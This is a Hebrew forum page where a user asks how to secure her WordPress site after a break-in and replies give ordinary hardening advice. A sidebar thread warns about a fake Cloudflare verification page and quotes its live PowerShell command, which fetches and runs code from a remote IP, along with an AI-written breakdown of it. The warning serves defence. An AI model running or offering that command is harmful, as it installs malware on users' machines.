איך לאבטח אתר אחרי פריצה

הירשם עכשיו!
  • הוסף לסימניות
  • #1
פרצו לאתר שהקמתי,
ב"ה בעזרת שרת האחסון (BOX) שיחזרנו אותו
ואני רק חייבת לאבטח אותו כמו שצריך עכשיו..

אשמח להמלצות באיזה דרכים לעשות זאת כדי למנוע פריצה חוזרת

תודה!
 
  • הוסף לסימניות
  • #2
זהו אתר וורדפרס?
אם כן, ממליצה מאוד על התוסף: All In One WP Security
עושה עבודה מעולה!
 
  • הוסף לסימניות
  • #4
אכן, וורדפרס
 
  • הוסף לסימניות
  • #5
לעשות סיסמה חזקה.
מנחש שהיה לך משהו בסגנון sarit1234, לא?
 
  • הוסף לסימניות
  • #6
סיסמא לאיפה? לFTP? לוורדפרס?
 
  • הוסף לסימניות
  • #8
תשמרי על תוספים מעודכנים
אם את מאוד פרנואידית תעשי חיפוש על התוספים שבהם את משתמשת איזה פרצות הם מכילים.
 
  • הוסף לסימניות
  • #9
ועוד כמה עצות:
תשני את שם המשתמש הראשי שלא יהיה ADMIN
תשני את הURL של מסך הכניסה לניהול
שכל הסיסמאות יהיו חזקות
תשני את ההגדרה של הקבצים htaccess. wp-config.php ל: 444

בהצלחה
 
  • הוסף לסימניות
  • #10
נכתב ע"י sarit_f;1955695:
סיסמא לאיפה? לFTP? לוורדפרס?
לחצ/י כדי להרחיב...
גם וגם.

כשאני אומר סיסמה חדשה אני מתכוון למשהו כזה: (a3Nr')gFf[P[p2e/k!st.LR,L)!'6?@]yQ}.ctJ;R

נראה לי שהדבר העיקרי תועלתי שיש בתוספי הגנה למיניהם, זה - שהם דורשים שתעשה סיסמה חזקה. חוץ מזה הם עושים הרבה רוח, ומשגעים אותך עם מיילים כל פעם שמישהו מנסה לנחש סיסמה (ואתה מרגיש טוב. יעני, הכל תחת שליטה שלי).
 
  • הוסף לסימניות
  • #11
נתחיל בלעדכן את האתר והתבנית לגרסה הכי עדכנית.
להשתמש בכמה שפחות תוספים - מה שאפשר לעשות בקוד לבד, עדיף לעשות לבד.

לבטל את האפשרות עריכת קבצים דרך הלוח בקרה:
This user does not have permission to use the HTML BB code.

נכתב ע"י גשר המיתרים;1955715:
תשני את ההגדרה של הקבצים htaccess. wp-config.php ל: 444
לחצ/י כדי להרחיב...
אמת, ניתן לעשות זאת כך - פתחי את הקובץ htaccess והוסיפי לתוכו:
This user does not have permission to use the HTML BB code.

והכי חשוב - לבצע לעשות גיבויים יומיים לאתר, ולא לשכוח לשנות את השם של האדמין מadmin למשהו יצירתי יותר :)
 
  • הוסף לסימניות
  • #12
לאחר פריצה?
לפני הכל לשנות את כל הסיסמאות! את הסיסמא למסד ל-FTP וכן לאתר עצמו לבעלי הראשות.
לאחר מכן תנסה להבין מה הייתה שיטת הפריצה ולסגור אותה.
תוספי אבטחה הם בהחלט נחמדים אבל הכל מתחיל בשאלה איך הפריצה התחילה לאחר שתכסה את האפשרויות האלו תעדכן את כל התוספים והערכות עיצוב לגרסא האחרונה ורק אז תתעסק עם תוספי אבטחה. iThemes Security Pro מספק לך אפשרויות הגנה שבהחלט מספיקות לאתר כולל אפילו אבטחה דו שלבית. אך קודם כאמור לאבטח את השרת עצמו!
 

פרוגבוט

תוכן שיווקי
פרסומת
עליך להתחבר או להירשם כדי להשיב כאן.

פוסטים חדשים שאולי לא קראת....

    • שאלה
    6
    • prog
    בטחוני פיקוד העורף: צפי לשיגורים למרכז והדרום
  • prog //
    • דובר צהל מזהיר הערב יש צפי לשיגורים לעבר מרכז ודרום הארץ
    3 תגובות
    לכל התגובות
     תגובה אחרונה 
    prog
    prog
    יש להשמע להנחיות פיקוד העורף
    • שאלה
    27
    • prog
    בטחוני אירוע בטחוני בבני ברק
  • prog //
    • נפל טיל ברחוב אביי ורבא. יש הרס רב
    8 תגובות
    לכל התגובות
     תגובה אחרונה 
    prog
    prog
    יש נפילות נוספות גם בפתח תקווה

    אשכולות דומים

  • 534
    • Y
    השראה שיתוף באתר חמוץ ביותר
  • Yummi Weinreb //
    • ידעתם שיש דבר כזה - מפעל לייצור חמוצים?
    אני אף פעם לא ידעתי.
    תקראו לי בורה, תקראו לי נאיבית, תקראו לי סתם סתומה, איך שמתחשק לכם לא משנה הסדר.
    אני בבורותי עמדתי: חמוצים זה דבר שסבתא כובשת בבית, ככה לאט ובאהבה בתוך צנצנת זכוכית מגניבה כזאת עם מכסה ירוק,
    או לחילופין - חמוצים מייצרים במפעלי ענק כאלה שמריצים סטוקים ענקיים של קופסאות שימורים משימורים שונים.
    לא כך?

    כך חשבתי, ובטעות טראגית כזאת גדלתי כל חיי,
    ועוד הייתי עתידה לגדול ולצמוח עוד עד מאה ועשרים שנה, כשחיי מבוססים על טעות שכזאת.

    עד שבאישון בוקר נעים וצח (טוב, האמת שזה היה ערב קריר וגשום),
    התקשר אליי דוד גלוק ובפיו בשורה:
    "היי יאמי, יש לי מפעל לייצור חמוצים ואני צריך אתר".

    - יש לך מפעל לייצור מה? שאלתי כמו סתומה.
    - חמוצים, חמוצים. פיקלס, השיב גלוק בעליזות אופיינית.
    - אני חושבת שלא שמעתי טוב. יש לך מפעל לייצור מה? שאלתי שוב, לא כמו אלא ממש-ממש.

    וכך התברר לי שיש במעלה אדומים מפעל, חמוד ומגניב ומרתק לגמרי,
    שבו אשכרה עומדים אנשים ומייצרים חמוצים, פיקלס, מכל הבא ליד. חריף, חמוץ-מתוק, חמוצים בטעם של פעם, חמוצים סתם סטנדרטיים, מיקסים של ירקות וכל מיני כאלה.
    פעם הבאה שאתם במעלה אדומים, תרימו טלפון לגלוק ותתאמו סיור. זה מגניב, תזכרו אני המלצתי.

    בקיצור - (שימו לב למה הכנסתי את עצמי: כאן בעצם הבטחתי לקצר. אהיייי!! מה עשיתי לעצמי, למה אני מבטיחה דברים שאין בכוחות נפשי לקיים?!)
    בקיצור,
    השלב הראשון של האתר היה להיפגש, ולדבר על מה אנחנו רוצים לעשות.
    מה צריך להיות באתר הזה? מה צריך לא להיות? מה המטרה של האתר?
    כל המידע הרגיל שצריך לדעת בשביל לעשות איפיון נכון.

    עכשיו צ'מעו קטע מגניב.
    במהלך השיחה, אני שואלת את גלוק את שאלת השאלות,
    השאלה הקריטית,
    החיונית ביותר,
    הדרמטית,
    ההיסטרית:
    למה בכלל אתה צריך אתר?
    שזאת, בעיניי, שאלה מאוד-מאוד חשובה. אני רוצה לדעת למה הלקוח החליט לבוא אליי ביום קייצי שכזה ולשלם לי הרבה כסף (מיליונים, ממש) - בשביל מה הוא צריך את כל זה? מה הוא רוצה להשיג?
    כשאני יודעת מה התשובה, אני יכולה לדעת מה המטרה הכי חשובה שאני צריכה להשיג באתר הזה.
    מה אני חייבת לעשות בו, כדי שאני אוכל לקרוא לו פרויקט הצלחה. מה אנחנו מנסים בעצם להשיג?

    בדרך כלל אני רגילה לשמוע תשובות כמו:
    “אני צריכה שיוכלו ליצור איתי קשר בצורה רשמית”
    “אני רוצה מקום שבו אוכל להציג את כל העבודות שלי בצורה יפה”
    “אני צריך מקום למכור את המוצרים שלי באופן אוטומטי”.
    הנה, הנה, תפסיקו לצעוק, אני מקצרת. אני מגיעה לפואנטה! תהיו בשקט ותנו לי לדבר, נו באמת!

    הלקוח הזה לא ענה לי שום דבר מעין זה.
    הוא גיחך קצת,
    ואז אמר:
    ת’אמת?
    אני בכלל לא צריך אתר.
    אני מסתדר יופי בלי זה.
    הלקוחות מכירים אותי, הספקים מכירים אותי, החנויות מכירות אותי,
    הכל טוב.

    נו????
    עיניי יוצאות מחוריהן,
    אז מה אתה משגע לי ת’שכל?
    קח את הכסף, קח ת’בריף, לך חזרה הביתה ונסיים כידידים! למה לבנות לך אתר???
    ואז הוא מגחך עוד קצת, ואומר:
    פשוט, אנחנו בשנת 2025. ואני חושב שבשנת 2025 עסק שמכבד את עצמו צריך אתר. ואני עסק שמכבד את עצמי.
    ככה שלמרות שאין שום מטרה ספציפית לאתר הזה,
    ואין לי שום כאב שאני צריך לפתור,
    ושום פסיכולוג לא אמר לי להקים אתר,
    ואישתי לא מצמידה לי אקדח לרקה שתהיה מפורסמת,
    אני צריך אתר.
    כי עסק ב2025 צריך שיהיה לו אתר.

    טרילילייי. הוא קנה אותי, חד וקנה. יאייי! עסק שמכבד את עצמו צריך אתר!!! שמעתם את זה, אנשים טובים והגונים? שמעתם??
    הוא לא צריך את זה, אבל הוא רוצה להיות עסק שמכבד את עצמו.
    אז למרות שאין שום מטרה לאתר הזה,
    הוא משקיע כמה אלפים בלבנות אותו,
    כי הוא רוצה תדמית, הוא רוצה כרטיס ביקור, הוא רוצה להיות עסק שמכבד את עצמו.


    בקיצור,
    הנה הנה, אנחנו מתקדמים! אנחנו אוחזים כבר בשלב השני!!!
    השלב השני היה האפיון.
    החלטנו שהאתר כולו יהיה בעברית, מכיוון שזוהי השפה של מרבית קהל היעד,
    אבל בגלל שחלק מאוד גדול של הלקוחות שלו אמריקאי ורוצה לראות אזכור לזה שהוא אמריקאי, נכניס גם את כל הכותרות באנגלית, וחוץ מזה גם את טקסט האודות כולו באנגלית ובעברית.
    משוגעת על התוצאה, חושבת שזה יצא פרפקטו.
    להלן הוויירפריים למול עיניכם, שתחזו עיניכם בעבודת המחשבת הזאת.
    וויירפריים.png

    השלב הבא היה כמובן העיצוב,
    שעליו אני לא צריכה בכלל לדבר, מספיק פשוט להראות לכם.
    תראו! תראו איזה יופי!!!
    עיצוב.png

    על הפונט המשוגע הזה אחראית, אגב, הממתגת שלו - חיה אסתר גולדמן האדירה.


    וזהו. והשלב האחרון היה כמובן הפיתוח, וורפדרס פלוס אלמנטור, אפס מוחלט של תוספים כדי שיהיה מהיר ועדכני - כל מה שהיה צריך לקסטם עשיתי בקוד,
    וזהו. ויש לנו אתר.

    אם תלחצו חזק חזק על הלינק הזה, אולי אפילו תזכו לראות אותו.
    טאדה. טאדה.

    תודה, תודה,
    אני אוהבת כשאתם מתלהבים ומחמיאים ומפדבקים ככה בקול, זה ממש גורם לי לעלוז.
    זה אפילו לא מסובך. כל מה שאתם צריכים לעשות זה לגלול קצת למטה, לכתוב שמה בתיבה הזאתי כמה התלהבתם על האתר ואיך שהוא מהמם, וללחוץ "פרסם תגובה". זהו, לא מסובך בכלל.
    וויירפריים.png
    עיצוב.png
    • תודה
    • וואו!
    • שכוייח!
    Reactions: וארנן לבוקר חסדך, הכל כבר תפוס, שמואל מוניץ ועוד 32 משתמשים35 //
    19 תגובות
    לכל התגובות
     תגובה אחרונה 
    ס
    ספרות בנשמה
    אתר מהמם קצר וקולע כתיבה שכיף לקרוא ✒️
  • 2 501
    • משה פפירוב
    מידע שימושי זהירות! וירוס בתחפושת!
  • משה פפירוב //
    • ניסיתי להכנס לאתר של הרב אפרתי - נותן הכשרות
    לאחר לחיצה על סימון - אתה לא רובוט...

    הופתעתי מאוד לראות את זה:
    1773765478164.png
    נראה חשוד!

    מאוד חשוד!!!

    ‫Gemini אמר​

    אזהרה: מדובר בהונאה ובתוכנה זדונית (Malware)

    התמונה שצירפת מציגה דף מזויף שמתחזה לשירות ההגנה Cloudflare, אך למעשה מדובר בשיטה להרצת קוד זדוני על המחשב שלך.

    למה זה מסוכן?

    ההוראות בתמונה מבקשות ממך לבצע רצף פעולות חריג מאוד:
    1. צירוף המקשים Win + R: פותח את חלון ה-"הפעלה" (Run) של ווינדוס, שמשמש להרצת פקודות מערכת.
    2. צירוף המקשים Ctrl + V: מדביק פקודה שהאתר העתיק ללוח הגזירים (Clipboard) שלך באופן אוטומטי ברגע שנכנסת לדף או לחצת על כפתור.
    3. לחיצה על OK: מריצה את הפקודה המודבקת.
    מה קורה בפועל?ברגע שתלחץ על OK, המחשב יריץ פקודה (בדרך כלל פקודת PowerShell) שמורידה ומתקינה וירוס, תוכנת כופר או תוכנה לגניבת סיסמאות ופרטי בנק. אף שירות אימות לגיטימי (כמו Cloudflare) לא יבקש ממך להריץ פקודות ידניות בחלון ה-Run של המערכת.


    מה עליך לעשות?

    • אל תבצע את ההוראות: אל תקיש על שום שילוב מקשים ואל תדביק דבר.
    • סגור את הלשונית מיד: צא מהאתר הזה ואל תחזור אליו.
    • סריקת וירוסים: מומלץ להריץ סריקה מלאה של האנטי-וירוס במחשב שלך (כמו Windows Defender או תוכנה מוכרת אחרת) ליתר ביטחון.
    • ניקוי היסטוריה: כדאי לנקות את הקבצים הזמניים והקוקיז בדפדפן.

    בדקתי בלוח מה הפקודה שהוא רצה שאני אריץ במחשב....
    זה הפקודה: powershell -c iex(irm 158.94.209.33 -UseBasicParsing) - סכנה! לא להריץ בשום אופן!!!!

    תקראו טוב מה גיימני כותב שזה עושה למחשב שלכם...

    זהירות! מדובר בתוכנה זדונית (Malware) ודאית.

    הפקודה שהעתקת היא הוכחה חותכת לכך שמדובר בניסיון פריצה. בוא נפרק את הפקודה כדי שתבין בדיוק מה היא מנסה לעשות למחשב שלך:

    • powershell: מפעיל את ממשק הפקודות המתקדם של ווינדוס. לממשק זה יש הרשאות עמוקות לשינוי הגדרות מערכת.
    • iex (Invoke-Expression): פקודה שאומרת למחשב: "כל מה שתקבל בהמשך – תריץ אותו כקוד עכשיו".
    • irm (Invoke-RestMethod): פקודה להורדת תוכן מהאינטרנט.
    • 158.94.209.33: זוהי כתובת IP של שרת מרוחק (שאינו קשור ל-Cloudflare). הפקודה מנסה למשוך קובץ "תסריט" (Script) מהשרת הזה.
    • -UseBasicParsing: הוראה לדפדפן הפנימי להתעלם מבדיקות תאימות ולהריץ את הקוד במהירות.


    מה המשמעות?

    ברגע שהיית לוחץ על OK, המחשב שלך היה פונה לכתובת ה-IP הזו, מוריד קוד זדוני (כמו סוס טרויאני או תוכנת כופר) ומריץ אותו מיד ברקע, בלי שתראה חלון נוסף או אזהרה.

    צעדים דחופים אם כבר הרצת את הפקודה:

    1. ניתוק מהאינטרנט: כבה את ה-Wi-Fi או נתק את כבל הרשת מיד כדי למנוע מהווירוס לשלוח מידע החוצה או להוריד רכיבים נוספים.
    2. סריקה במצב בטוח: הפעל את המחשב ב-"מצב בטוח" (Safe Mode) והרץ סריקה מלאה של אנטי-וירוס מעודכן.
    3. שינוי סיסמאות: ממכשיר אחר (טלפון או מחשב נקי), שנה סיסמאות לחשבונות רגישים (מייל, בנק, רשתות חברתיות).


    אוסיף שבדקתי את הכתובת שהפקודה פונה אליה
    באתר בדיקת כתובות אינטרנט - האם הן וירוס
    הנה הקישור לבדיקה:     https://www.virustotal.com/gui/url/bd5456fb856d9b4d0d4cea1c68edf7e1793e6a72fb9ac037f4f05d1bba65c18c
    מוזמנים לראות את התוצאה....
    לחצ/י כדי להרחיב...


    מסקנה:

    זהירות!!!
    1773765478164.png
    • תודה
    • שכוייח!
    • וואו!
    Reactions: יעקב ויצמן, בלת"ק (:, תשעים ותשע ועוד 24 משתמשים27 //
    20 תגובות
    לכל התגובות
     תגובה אחרונה 
    5
    5566brs
    ניתוח מלא של הוירוס קיים כאן נכון לעכשיו הוירוס עדיין פעיל בחלק מהכתובות המופיעות שם, אבל חלק...
    הצטרפות לקהילת דיגיטל
    הצטרפות לקהילת UX UI
    פרסום בפרוג ←

    הצטרפות לניוזלטר

    מאשר/ת קבלת תוכן חם למייל
    בשליחת הטופס אני מסכים/ה שבית פרוג תשתמש במידע למטרות שיווק, דיוור ישיר ומשלוח פרסומות באמצעי הקשר שמסרתי, ותכלול אותו במאגר המידע של החברה, והכל בכפוף למדיניות הפרטיות של החברה.
    להסרה בעתיד פנה/י לדוא"ל office@prog.co.il או לטלפון: 072-2201430

    איזה כיף שהצטרפתם לניוזלטר שלנו!

    מעכשיו, תהיו הראשונים לקבל את כל העדכונים, החדשות, ההפתעות בלעדיות, והתכנים הכי חמים שלנו בפרוג!

    לוח לימודים

    מסלולי לימוד שאפשר להצטרף
    אליהם ממש עכשיו:

    26.04

    ט' אייר


    קורס עימוד ועיצוב ספרים

    ההרשמה בעיצומה

    30.04

    י"ג אייר


    קורס בוטים ואוטומציות עיסקיות

    ההרשמה בעיצומה

    10.05

    כ"ג אייר


    קורס שיווק ופרסום דיגיטלי

    נפתחה ההרשמה

    14.05

    כ"ז אייר


    קורס שמאות רכוש

    נפתחה ההרשמה

    14.06

    כ"ט סיוון


    קורס אדריכלות עיצוב פנים

    נפתחה ההרשמה
    לכל מסלולי הלימוד

    לוח מודעות

    הפרק היומי

    הפרק היומי! כל ערב פרק תהילים חדש. הצטרפו אלינו לקריאת תהילים משותפת!


    תהילים פרק כה

    אלְדָוִד אֵלֶיךָ יי נַפְשִׁי אֶשָּׂא:באֱלֹהַי בְּךָ בָטַחְתִּי אַל אֵבוֹשָׁה אַל יַעַלְצוּ אֹיְבַי לִי:גגַּם כָּל קוֶֹיךָ לֹא יֵבֹשׁוּ יֵבֹשׁוּ הַבּוֹגְדִים רֵיקָם:דדְּרָכֶיךָ יי הוֹדִיעֵנִי אֹרְחוֹתֶיךָ לַמְּדֵנִי:ההַדְרִיכֵנִי בַאֲמִתֶּךָ וְלַמְּדֵנִי כִּי אַתָּה אֱלֹהֵי יִשְׁעִי אוֹתְךָ קִוִּיתִי כָּל הַיּוֹם:וזְכֹר רַחֲמֶיךָ יי וַחֲסָדֶיךָ כִּי מֵעוֹלָם הֵמָּה:זחַטֹּאות נְעוּרַי וּפְשָׁעַי אַל תִּזְכֹּר כְּחַסְדְּךָ זְכָר לִי אַתָּה לְמַעַן טוּבְךָ יי:חטוֹב וְיָשָׁר יי עַל כֵּן יוֹרֶה חַטָּאִים בַּדָּרֶךְ:טיַדְרֵךְ עֲנָוִים בַּמִּשְׁפָּט וִילַמֵּד עֲנָוִים דַּרְכּוֹ:יכָּל אָרְחוֹת יי חֶסֶד וֶאֱמֶת לְנֹצְרֵי בְרִיתוֹ וְעֵדֹתָיו:יאלְמַעַן שִׁמְךָ יי וְסָלַחְתָּ לַעֲוֹנִי כִּי רַב הוּא:יבמִי זֶה הָאִישׁ יְרֵא יי יוֹרֶנּוּ בְּדֶרֶךְ יִבְחָר:יגנַפְשׁוֹ בְּטוֹב תָּלִין וְזַרְעוֹ יִירַשׁ אָרֶץ:ידסוֹד יי לִירֵאָיו וּבְרִיתוֹ לְהוֹדִיעָם:טועֵינַי תָּמִיד אֶל יי כִּי הוּא יוֹצִיא מֵרֶשֶׁת רַגְלָי:טזפְּנֵה אֵלַי וְחָנֵּנִי כִּי יָחִיד וְעָנִי אָנִי:יזצָרוֹת לְבָבִי הִרְחִיבוּ מִמְּצוּקוֹתַי הוֹצִיאֵנִי:יחרְאֵה עָנְיִי וַעֲמָלִי וְשָׂא לְכָל חַטֹּאותָי:יטרְאֵה אוֹיְבַי כִּי רָבּוּ וְשִׂנְאַת חָמָס שְׂנֵאוּנִי:כשָׁמְרָה נַפְשִׁי וְהַצִּילֵנִי אַל אֵבוֹשׁ כִּי חָסִיתִי בָךְ:כאתֹּם וָיֹשֶׁר יִצְּרוּנִי כִּי קִוִּיתִיךָ:כבפְּדֵה אֱלֹהִים אֶת יִשְׂרָאֵל מִכֹּל צָרוֹתָיו:
    סמן אחרי הקריאה
    לקריאה בפורום
    נקרא  2  פעמים
    פיקוח של ועדת הרבנים 'שמור'
    למעלה